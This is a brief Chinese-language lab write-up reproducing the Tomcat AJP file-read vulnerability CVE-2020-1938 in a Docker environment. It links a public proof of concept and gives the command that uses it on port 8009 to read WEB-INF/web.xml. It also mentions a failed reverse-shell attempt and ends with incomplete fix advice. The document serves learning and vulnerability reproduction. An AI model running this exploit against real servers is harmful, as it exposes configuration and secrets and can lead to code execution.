CVE-2020-1938
该漏洞是由于Tomcat AJp协议存在的缺陷导致的,攻击者利用该漏洞可通过构造特定参数,读取服务器下的webapp任意文件。若目标服务器同时存在上传漏洞,可以进一步实现远程代码执行。
tomcat JAP协议文件包含。
靶机 kali
攻击机 kali
环境 docker 下的 tomcat/CVE-2020-1938
版本 tomcat 9.0.30
1.开启容器
cd tomcat/CVE-2020-1938
docker-compose up -d
2.使用nmap扫描一下端口。
4.漏洞复现
POC:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi
读取WEB-INF/web.xml文件
python CNVD-2020-10487-Tomcat-Ajp-lfi.py IP -p 8009 -f WEB-INF/web.xml
后面反弹shell一直没成功,太菜了
修复建议:
1.升级版本
2在在tomcat工作目录中修改conf/server.xml
注释掉